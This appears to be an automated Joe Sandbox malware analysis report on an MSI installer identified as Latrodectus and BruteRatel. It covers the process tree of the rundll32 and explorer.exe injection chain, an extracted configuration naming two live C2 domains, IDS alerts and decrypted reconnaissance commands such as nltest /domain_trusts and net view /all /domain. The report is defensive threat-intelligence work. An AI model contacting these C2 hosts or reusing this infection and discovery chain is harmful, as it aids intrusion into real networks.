Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
medk.msi

Overview

General Information

Sample name:medk.msi
Analysis ID:1555319
MD5:8cb04bf931a19fa0ae1bd7235180dd4a
SHA1:dfc980a827dbde294ae9fa6e63545d1d57344e96
SHA256:dfff1a07429ff9585f3dab9c78b501174e7c326e1fb95c5234368071b5426768
Tags:msiuser-pr0xylife
Infos:

Detection

BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 2788 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\medk.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6184 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 4592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI8F42.tmp (PID: 2120 cmdline: "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 2036 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3784 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Theta", "Campaign ID": 1989698107}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
    00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
      00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
        00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
          Process Memory Space: rundll32.exe PID: 3784JoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: RunDLL32 Spawning Explorer
            Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3784, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4004, ProcessName: explorer.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T18:20:20.516009+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649754TCP
            2024-11-13T18:20:58.427119+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649956TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T18:21:35.289353+010020283713Unknown Traffic192.168.2.649988104.21.92.105443TCP
            2024-11-13T18:21:36.742312+010020283713Unknown Traffic192.168.2.649989104.21.15.162443TCP
            2024-11-13T18:21:39.299333+010020283713Unknown Traffic192.168.2.649990104.21.92.105443TCP
            2024-11-13T18:21:40.716651+010020283713Unknown Traffic192.168.2.649991104.21.15.162443TCP
            2024-11-13T18:21:42.395163+010020283713Unknown Traffic192.168.2.649992104.21.92.105443TCP
            2024-11-13T18:21:43.584276+010020283713Unknown Traffic192.168.2.649993104.21.15.162443TCP
            2024-11-13T18:21:45.443244+010020283713Unknown Traffic192.168.2.649994104.21.92.105443TCP
            2024-11-13T18:21:47.397878+010020283713Unknown Traffic192.168.2.649995104.21.15.162443TCP
            2024-11-13T18:21:48.622876+010020283713Unknown Traffic192.168.2.649996104.21.92.105443TCP
            2024-11-13T18:21:50.027586+010020283713Unknown Traffic192.168.2.649997104.21.15.162443TCP
            2024-11-13T18:21:51.751655+010020283713Unknown Traffic192.168.2.649998104.21.92.105443TCP
            2024-11-13T18:21:54.029296+010020283713Unknown Traffic192.168.2.649999104.21.15.162443TCP
            2024-11-13T18:21:55.239147+010020283713Unknown Traffic192.168.2.650000104.21.92.105443TCP
            2024-11-13T18:21:56.848285+010020283713Unknown Traffic192.168.2.650001104.21.15.162443TCP
            2024-11-13T18:21:58.482924+010020283713Unknown Traffic192.168.2.650003104.21.92.105443TCP
            2024-11-13T18:21:59.983991+010020283713Unknown Traffic192.168.2.650004104.21.15.162443TCP
            2024-11-13T18:22:00.966575+010020283713Unknown Traffic192.168.2.650005104.21.92.105443TCP
            2024-11-13T18:22:01.861079+010020283713Unknown Traffic192.168.2.650006104.21.15.162443TCP
            2024-11-13T18:22:02.912371+010020283713Unknown Traffic192.168.2.650007104.21.92.105443TCP
            2024-11-13T18:22:04.419792+010020283713Unknown Traffic192.168.2.650008104.21.15.162443TCP
            2024-11-13T18:22:06.671027+010020283713Unknown Traffic192.168.2.650010104.21.92.105443TCP
            2024-11-13T18:22:08.316987+010020283713Unknown Traffic192.168.2.650011104.21.15.162443TCP
            2024-11-13T18:22:09.788113+010020283713Unknown Traffic192.168.2.650012104.21.92.105443TCP
            2024-11-13T18:22:11.153189+010020283713Unknown Traffic192.168.2.650013104.21.15.162443TCP
            2024-11-13T18:22:12.681683+010020283713Unknown Traffic192.168.2.650014104.21.92.105443TCP
            2024-11-13T18:22:14.294877+010020283713Unknown Traffic192.168.2.650015104.21.15.162443TCP
            2024-11-13T18:22:15.982040+010020283713Unknown Traffic192.168.2.650016104.21.92.105443TCP
            2024-11-13T18:22:17.325529+010020283713Unknown Traffic192.168.2.650017104.21.15.162443TCP
            2024-11-13T18:22:18.397920+010020283713Unknown Traffic192.168.2.650018104.21.92.105443TCP
            2024-11-13T18:22:19.737666+010020283713Unknown Traffic192.168.2.650019104.21.15.162443TCP
            2024-11-13T18:22:21.409128+010020283713Unknown Traffic192.168.2.650020104.21.92.105443TCP
            2024-11-13T18:22:23.039590+010020283713Unknown Traffic192.168.2.650021104.21.15.162443TCP
            2024-11-13T18:22:24.805613+010020283713Unknown Traffic192.168.2.650022104.21.92.105443TCP
            2024-11-13T18:22:26.173414+010020283713Unknown Traffic192.168.2.650023104.21.15.162443TCP
            2024-11-13T18:22:27.540954+010020283713Unknown Traffic192.168.2.650024104.21.92.105443TCP
            2024-11-13T18:22:28.687333+010020283713Unknown Traffic192.168.2.650025104.21.15.162443TCP
            2024-11-13T18:22:29.900602+010020283713Unknown Traffic192.168.2.650026104.21.92.105443TCP
            2024-11-13T18:22:31.429651+010020283713Unknown Traffic192.168.2.650027104.21.15.162443TCP
            2024-11-13T18:22:33.096565+010020283713Unknown Traffic192.168.2.650028104.21.92.105443TCP
            2024-11-13T18:22:34.500030+010020283713Unknown Traffic192.168.2.650030104.21.15.162443TCP
            2024-11-13T18:22:35.673101+010020283713Unknown Traffic192.168.2.650032104.21.92.105443TCP
            2024-11-13T18:22:37.181142+010020283713Unknown Traffic192.168.2.650033104.21.15.162443TCP
            2024-11-13T18:22:39.892991+010020283713Unknown Traffic192.168.2.650034104.21.92.105443TCP
            2024-11-13T18:22:41.066186+010020283713Unknown Traffic192.168.2.650035104.21.15.162443TCP
            2024-11-13T18:22:42.478083+010020283713Unknown Traffic192.168.2.650036104.21.92.105443TCP
            2024-11-13T18:22:44.268059+010020283713Unknown Traffic192.168.2.650037104.21.15.162443TCP
            2024-11-13T18:22:45.547937+010020283713Unknown Traffic192.168.2.650038104.21.92.105443TCP
            2024-11-13T18:22:47.040842+010020283713Unknown Traffic192.168.2.650039104.21.15.162443TCP
            2024-11-13T18:22:48.238909+010020283713Unknown Traffic192.168.2.650040104.21.92.105443TCP
            2024-11-13T18:22:49.532459+010020283713Unknown Traffic192.168.2.650041104.21.15.162443TCP
            2024-11-13T18:22:51.299788+010020283713Unknown Traffic192.168.2.650042104.21.92.105443TCP
            2024-11-13T18:22:52.434082+010020283713Unknown Traffic192.168.2.650043104.21.15.162443TCP
            2024-11-13T18:22:53.735864+010020283713Unknown Traffic192.168.2.650044104.21.92.105443TCP
            2024-11-13T18:22:55.151098+010020283713Unknown Traffic192.168.2.650045104.21.15.162443TCP
            2024-11-13T18:22:57.103138+010020283713Unknown Traffic192.168.2.650046104.21.92.105443TCP
            2024-11-13T18:22:58.946530+010020283713Unknown Traffic192.168.2.650047104.21.15.162443TCP
            2024-11-13T18:23:00.285448+010020283713Unknown Traffic192.168.2.650048104.21.92.105443TCP
            2024-11-13T18:23:01.834162+010020283713Unknown Traffic192.168.2.650049104.21.15.162443TCP
            2024-11-13T18:23:03.439760+010020283713Unknown Traffic192.168.2.650050104.21.92.105443TCP
            2024-11-13T18:23:04.744340+010020283713Unknown Traffic192.168.2.650051104.21.15.162443TCP
            2024-11-13T18:23:06.367173+010020283713Unknown Traffic192.168.2.650053104.21.92.105443TCP
            2024-11-13T18:23:07.792039+010020283713Unknown Traffic192.168.2.650054104.21.15.162443TCP
            2024-11-13T18:23:09.034125+010020283713Unknown Traffic192.168.2.650055104.21.92.105443TCP
            2024-11-13T18:23:10.241740+010020283713Unknown Traffic192.168.2.650056104.21.15.162443TCP
            2024-11-13T18:23:11.469710+010020283713Unknown Traffic192.168.2.650057104.21.92.105443TCP
            2024-11-13T18:23:12.752330+010020283713Unknown Traffic192.168.2.650058104.21.15.162443TCP
            2024-11-13T18:23:14.697821+010020283713Unknown Traffic192.168.2.650059104.21.92.105443TCP
            2024-11-13T18:23:16.145916+010020283713Unknown Traffic192.168.2.650061104.21.15.162443TCP
            2024-11-13T18:23:17.621379+010020283713Unknown Traffic192.168.2.650062104.21.92.105443TCP
            2024-11-13T18:23:19.190901+010020283713Unknown Traffic192.168.2.650063104.21.15.162443TCP
            2024-11-13T18:23:20.884938+010020283713Unknown Traffic192.168.2.650064104.21.92.105443TCP
            2024-11-13T18:23:22.316802+010020283713Unknown Traffic192.168.2.650065104.21.15.162443TCP
            2024-11-13T18:23:23.601065+010020283713Unknown Traffic192.168.2.650066104.21.92.105443TCP
            2024-11-13T18:23:24.783669+010020283713Unknown Traffic192.168.2.650067104.21.15.162443TCP
            2024-11-13T18:23:26.057648+010020283713Unknown Traffic192.168.2.650068104.21.92.105443TCP
            2024-11-13T18:23:27.930928+010020283713Unknown Traffic192.168.2.650069104.21.15.162443TCP
            2024-11-13T18:23:29.432946+010020283713Unknown Traffic192.168.2.650070104.21.92.105443TCP
            2024-11-13T18:23:30.836937+010020283713Unknown Traffic192.168.2.650071104.21.15.162443TCP
            2024-11-13T18:23:32.368537+010020283713Unknown Traffic192.168.2.650072104.21.92.105443TCP
            2024-11-13T18:23:33.673410+010020283713Unknown Traffic192.168.2.650074104.21.15.162443TCP
            2024-11-13T18:23:35.075522+010020283713Unknown Traffic192.168.2.650075104.21.92.105443TCP
            2024-11-13T18:23:35.965995+010020283713Unknown Traffic192.168.2.650076104.21.15.162443TCP
            2024-11-13T18:23:37.485237+010020283713Unknown Traffic192.168.2.650077104.21.92.105443TCP
            2024-11-13T18:23:38.786475+010020283713Unknown Traffic192.168.2.650078104.21.15.162443TCP
            2024-11-13T18:23:40.158051+010020283713Unknown Traffic192.168.2.650079104.21.92.105443TCP
            2024-11-13T18:23:41.606161+010020283713Unknown Traffic192.168.2.650080104.21.15.162443TCP
            2024-11-13T18:23:43.466328+010020283713Unknown Traffic192.168.2.650081104.21.92.105443TCP
            2024-11-13T18:23:44.811578+010020283713Unknown Traffic192.168.2.650082104.21.15.162443TCP
            2024-11-13T18:23:46.120580+010020283713Unknown Traffic192.168.2.650083104.21.92.105443TCP
            2024-11-13T18:23:47.721691+010020283713Unknown Traffic192.168.2.650084104.21.15.162443TCP
            2024-11-13T18:23:49.135574+010020283713Unknown Traffic192.168.2.650085104.21.92.105443TCP
            2024-11-13T18:23:50.473952+010020283713Unknown Traffic192.168.2.650086104.21.15.162443TCP
            2024-11-13T18:23:52.244014+010020283713Unknown Traffic192.168.2.650087104.21.92.105443TCP
            2024-11-13T18:23:53.654205+010020283713Unknown Traffic192.168.2.650088104.21.15.162443TCP
            2024-11-13T18:23:54.892301+010020283713Unknown Traffic192.168.2.650089104.21.92.105443TCP
            2024-11-13T18:23:56.149717+010020283713Unknown Traffic192.168.2.650090104.21.15.162443TCP
            2024-11-13T18:23:57.448972+010020283713Unknown Traffic192.168.2.650091104.21.92.105443TCP
            2024-11-13T18:23:58.865757+010020283713Unknown Traffic192.168.2.650092104.21.15.162443TCP
            2024-11-13T18:24:00.671218+010020283713Unknown Traffic192.168.2.650093104.21.92.105443TCP
            2024-11-13T18:24:02.013688+010020283713Unknown Traffic192.168.2.650094104.21.15.162443TCP
            2024-11-13T18:24:03.637736+010020283713Unknown Traffic192.168.2.650095104.21.92.105443TCP
            2024-11-13T18:24:06.448528+010020283713Unknown Traffic192.168.2.650096104.21.15.162443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-13T18:21:35.325555+010020487351A Network Trojan was detected192.168.2.649988104.21.92.105443TCP
            2024-11-13T18:21:36.745751+010020487351A Network Trojan was detected192.168.2.649989104.21.15.162443TCP
            2024-11-13T18:21:39.300933+010020487351A Network Trojan was detected192.168.2.649990104.21.92.105443TCP
            2024-11-13T18:21:40.718248+010020487351A Network Trojan was detected192.168.2.649991104.21.15.162443TCP
            2024-11-13T18:21:42.396983+010020487351A Network Trojan was detected192.168.2.649992104.21.92.105443TCP
            2024-11-13T18:21:43.585814+010020487351A Network Trojan was detected192.168.2.649993104.21.15.162443TCP
            2024-11-13T18:21:45.444884+010020487351A Network Trojan was detected192.168.2.649994104.21.92.105443TCP
            2024-11-13T18:21:47.399255+010020487351A Network Trojan was detected192.168.2.649995104.21.15.162443TCP
            2024-11-13T18:21:48.624530+010020487351A Network Trojan was detected192.168.2.649996104.21.92.105443TCP
            2024-11-13T18:21:50.029215+010020487351A Network Trojan was detected192.168.2.649997104.21.15.162443TCP
            2024-11-13T18:21:51.753617+010020487351A Network Trojan was detected192.168.2.649998104.21.92.105443TCP
            2024-11-13T18:21:55.240793+010020487351A Network Trojan was detected192.168.2.650000104.21.92.105443TCP
            2024-11-13T18:21:56.851903+010020487351A Network Trojan was detected192.168.2.650001104.21.15.162443TCP
            2024-11-13T18:21:58.484908+010020487351A Network Trojan was detected192.168.2.650003104.21.92.105443TCP
            2024-11-13T18:21:59.985634+010020487351A Network Trojan was detected192.168.2.650004104.21.15.162443TCP
            2024-11-13T18:22:00.968674+010020487351A Network Trojan was detected192.168.2.650005104.21.92.105443TCP
            2024-11-13T18:22:01.880801+010020487351A Network Trojan was detected192.168.2.650006104.21.15.162443TCP
            2024-11-13T18:22:02.913859+010020487351A Network Trojan was detected192.168.2.650007104.21.92.105443TCP
            2024-11-13T18:22:04.427996+010020487351A Network Trojan was detected192.168.2.650008104.21.15.162443TCP
            2024-11-13T18:22:06.697900+010020487351A Network Trojan was detected192.168.2.650010104.21.92.105443TCP
            2024-11-13T18:22:08.318470+010020487351A Network Trojan was detected192.168.2.650011104.21.15.162443TCP
            2024-11-13T18:22:09.789779+010020487351A Network Trojan was detected192.168.2.650012104.21.92.105443TCP
            2024-11-13T18:22:11.155356+010020487351A Network Trojan was detected192.168.2.650013104.21.15.162443TCP
            2024-11-13T18:22:12.683403+010020487351A Network Trojan was detected192.168.2.650014104.21.92.105443TCP
            2024-11-13T18:22:14.296434+010020487351A Network Trojan was detected192.168.2.650015104.21.15.162443TCP
            2024-11-13T18:22:15.983549+010020487351A Network Trojan was detected192.168.2.650016104.21.92.105443TCP
            2024-11-13T18:22:17.331157+010020487351A Network Trojan was detected192.168.2.650017104.21.15.162443TCP
            2024-11-13T18:22:18.399575+010020487351A Network Trojan was detected192.168.2.650018104.21.92.105443TCP
            2024-11-13T18:22:19.739101+010020487351A Network Trojan was detected192.168.2.650019104.21.15.162443TCP
            2024-11-13T18:22:21.410907+010020487351A Network Trojan was detected192.168.2.650020104.21.92.105443TCP
            2024-11-13T18:22:23.041999+010020487351A Network Trojan was detected192.168.2.650021104.21.15.162443TCP
            2024-11-13T18:22:24.807513+010020487351A Network Trojan was detected192.168.2.650022104.21.92.105443TCP
            2024-11-13T18:22:26.178401+010020487351A Network Trojan was detected192.168.2.650023104.21.15.162443TCP
            2024-11-13T18:22:27.543087+010020487351A Network Trojan was detected192.168.2.650024104.21.92.105443TCP
            2024-11-13T18:22:28.689063+010020487351A Network Trojan was detected192.168.2.650025104.21.15.162443TCP
            2024-11-13T18:22:29.905136+010020487351A Network Trojan was detected192.168.2.650026104.21.92.105443TCP
            2024-11-13T18:22:31.431657+010020487351A Network Trojan was detected192.168.2.650027104.21.15.162443TCP
            2024-11-13T18:22:33.098757+010020487351A Network Trojan was detected192.168.2.650028104.21.92.105443TCP
            2024-11-13T18:22:34.501612+010020487351A Network Trojan was detected192.168.2.650030104.21.15.162443TCP
            2024-11-13T18:22:35.678117+010020487351A Network Trojan was detected192.168.2.650032104.21.92.105443TCP
            2024-11-13T18:22:37.183209+010020487351A Network Trojan was detected192.168.2.650033104.21.15.162443TCP
            2024-11-13T18:22:39.894562+010020487351A Network Trojan was detected192.168.2.650034104.21.92.105443TCP
            2024-11-13T18:22:41.067957+010020487351A Network Trojan was detected192.168.2.650035104.21.15.162443TCP
            2024-11-13T18:22:42.480274+010020487351A Network Trojan was detected192.168.2.650036104.21.92.105443TCP
            2024-11-13T18:22:44.269690+010020487351A Network Trojan was detected192.168.2.650037104.21.15.162443TCP
            2024-11-13T18:22:45.550809+010020487351A Network Trojan was detected192.168.2.650038104.21.92.105443TCP
            2024-11-13T18:22:47.043304+010020487351A Network Trojan was detected192.168.2.650039104.21.15.162443TCP
            2024-11-13T18:22:48.240620+010020487351A Network Trojan was detected192.168.2.650040104.21.92.105443TCP
            2024-11-13T18:22:49.534433+010020487351A Network Trojan was detected192.168.2.650041104.21.15.162443TCP
            2024-11-13T18:22:51.301944+010020487351A Network Trojan was detected192.168.2.650042104.21.92.105443TCP
            2024-11-13T18:22:52.435848+010020487351A Network Trojan was detected192.168.2.650043104.21.15.162443TCP
            2024-11-13T18:22:53.737613+010020487351A Network Trojan was detected192.168.2.650044104.21.92.105443TCP
            2024-11-13T18:22:55.153007+010020487351A Network Trojan was detected192.168.2.650045104.21.15.162443TCP
            2024-11-13T18:22:57.105060+010020487351A Network Trojan was detected192.168.2.650046104.21.92.105443TCP
            2024-11-13T18:22:58.971880+010020487351A Network Trojan was detected192.168.2.650047104.21.15.162443TCP
            2024-11-13T18:23:00.287129+010020487351A Network Trojan was detected192.168.2.650048104.21.92.105443TCP
            2024-11-13T18:23:01.835907+010020487351A Network Trojan was detected192.168.2.650049104.21.15.162443TCP
            2024-11-13T18:23:03.441860+010020487351A Network Trojan was detected192.168.2.650050104.21.92.105443TCP
            2024-11-13T18:23:04.746138+010020487351A Network Trojan was detected192.168.2.650051104.21.15.162443TCP
            2024-11-13T18:23:06.367358+010020487351A Network Trojan was detected192.168.2.650053104.21.92.105443TCP
            2024-11-13T18:23:07.797628+010020487351A Network Trojan was detected192.168.2.650054104.21.15.162443TCP
            2024-11-13T18:23:09.036279+010020487351A Network Trojan was detected192.168.2.650055104.21.92.105443TCP
            2024-11-13T18:23:10.244065+010020487351A Network Trojan was detected192.168.2.650056104.21.15.162443TCP
            2024-11-13T18:23:11.471628+010020487351A Network Trojan was detected192.168.2.650057104.21.92.105443TCP
            2024-11-13T18:23:12.753942+010020487351A Network Trojan was detected192.168.2.650058104.21.15.162443TCP
            2024-11-13T18:23:14.700323+010020487351A Network Trojan was detected192.168.2.650059104.21.92.105443TCP
            2024-11-13T18:23:16.169310+010020487351A Network Trojan was detected192.168.2.650061104.21.15.162443TCP
            2024-11-13T18:23:17.623742+010020487351A Network Trojan was detected192.168.2.650062104.21.92.105443TCP
            2024-11-13T18:23:19.192979+010020487351A Network Trojan was detected192.168.2.650063104.21.15.162443TCP
            2024-11-13T18:23:20.886689+010020487351A Network Trojan was detected192.168.2.650064104.21.92.105443TCP
            2024-11-13T18:23:22.318351+010020487351A Network Trojan was detected192.168.2.650065104.21.15.162443TCP
            2024-11-13T18:23:23.603206+010020487351A Network Trojan was detected192.168.2.650066104.21.92.105443TCP
            2024-11-13T18:23:24.785334+010020487351A Network Trojan was detected192.168.2.650067104.21.15.162443TCP
            2024-11-13T18:23:26.059590+010020487351A Network Trojan was detected192.168.2.650068104.21.92.105443TCP
            2024-11-13T18:23:27.932558+010020487351A Network Trojan was detected192.168.2.650069104.21.15.162443TCP
            2024-11-13T18:23:29.434900+010020487351A Network Trojan was detected192.168.2.650070104.21.92.105443TCP
            2024-11-13T18:23:30.907646+010020487351A Network Trojan was detected192.168.2.650071104.21.15.162443TCP
            2024-11-13T18:23:32.370472+010020487351A Network Trojan was detected192.168.2.650072104.21.92.105443TCP
            2024-11-13T18:23:33.675075+010020487351A Network Trojan was detected192.168.2.650074104.21.15.162443TCP
            2024-11-13T18:23:35.978016+010020487351A Network Trojan was detected192.168.2.650076104.21.15.162443TCP
            2024-11-13T18:23:37.488955+010020487351A Network Trojan was detected192.168.2.650077104.21.92.105443TCP
            2024-11-13T18:23:38.843722+010020487351A Network Trojan was detected192.168.2.650078104.21.15.162443TCP
            2024-11-13T18:23:40.162202+010020487351A Network Trojan was detected192.168.2.650079104.21.92.105443TCP
            2024-11-13T18:23:41.608211+010020487351A Network Trojan was detected192.168.2.650080104.21.15.162443TCP
            2024-11-13T18:23:43.468381+010020487351A Network Trojan was detected192.168.2.650081104.21.92.105443TCP
            2024-11-13T18:23:44.813523+010020487351A Network Trojan was detected192.168.2.650082104.21.15.162443TCP
            2024-11-13T18:23:46.122183+010020487351A Network Trojan was detected192.168.2.650083104.21.92.105443TCP
            2024-11-13T18:23:47.723658+010020487351A Network Trojan was detected192.168.2.650084104.21.15.162443TCP
            2024-11-13T18:23:49.188326+010020487351A Network Trojan was detected192.168.2.650085104.21.92.105443TCP
            2024-11-13T18:23:50.475471+010020487351A Network Trojan was detected192.168.2.650086104.21.15.162443TCP
            2024-11-13T18:23:52.245828+010020487351A Network Trojan was detected192.168.2.650087104.21.92.105443TCP
            2024-11-13T18:23:53.655852+010020487351A Network Trojan was detected192.168.2.650088104.21.15.162443TCP
            2024-11-13T18:23:54.894110+010020487351A Network Trojan was detected192.168.2.650089104.21.92.105443TCP
            2024-11-13T18:23:56.151417+010020487351A Network Trojan was detected192.168.2.650090104.21.15.162443TCP
            2024-11-13T18:23:57.450937+010020487351A Network Trojan was detected192.168.2.650091104.21.92.105443TCP
            2024-11-13T18:23:58.867912+010020487351A Network Trojan was detected192.168.2.650092104.21.15.162443TCP
            2024-11-13T18:24:00.673149+010020487351A Network Trojan was detected192.168.2.650093104.21.92.105443TCP
            2024-11-13T18:24:02.015284+010020487351A Network Trojan was detected192.168.2.650094104.21.15.162443TCP
            2024-11-13T18:24:03.644319+010020487351A Network Trojan was detected192.168.2.650095104.21.92.105443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://rolefenik.com/test/gAvira URL Cloud: Label: malware
            Source: https://rolefenik.com/test/~Avira URL Cloud: Label: malware
            Source: https://ergiholim.com/SAvira URL Cloud: Label: malware
            Source: https://rolefenik.com/Avira URL Cloud: Label: malware
            Source: https://ergiholim.com/test/cAvira URL Cloud: Label: malware
            Source: https://ergiholim.com/test/gAvira URL Cloud: Label: malware
            Source: https://ergiholim.com/test/_Avira URL Cloud: Label: malware
            Source: https://ergiholim.com/test/bleSyncOnActivityFeedAvira URL Cloud: Label: malware
            Source: https://rolefenik.com/XAvira URL Cloud: Label: malware
            Source: https://ergiholim.com/Avira URL Cloud: Label: malware
            Source: https://ergiholim.com/test/pAvira URL Cloud: Label: malware
            Source: https://rolefenik.com/cAvira URL Cloud: Label: malware
            Source: https://rolefenik.com/test/Avira URL Cloud: Label: malware
            Source: https://rolefenik.com/test/KAvira URL Cloud: Label: malware
            Source: https://rolefenik.com/test/3Avira URL Cloud: Label: malware
            Source: https://rolefenik.com/test/;Avira URL Cloud: Label: malware
            Source: https://ergiholim.com/test/Avira URL Cloud: Label: malware
            Source: https://rolefenik.com/est/Avira URL Cloud: Label: malware
            Source: https://rolefenik.com/KAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 8.2.explorer.exe.2e00000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Theta", "Campaign ID": 1989698107}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Sample uses string decryption to hide its real strings
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c ipconfig /all
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c systeminfo
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c nltest /domain_trusts
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c net view /all
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c nltest /domain_trusts /all_trusts
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpackString decryptor: /c net view /all /domain
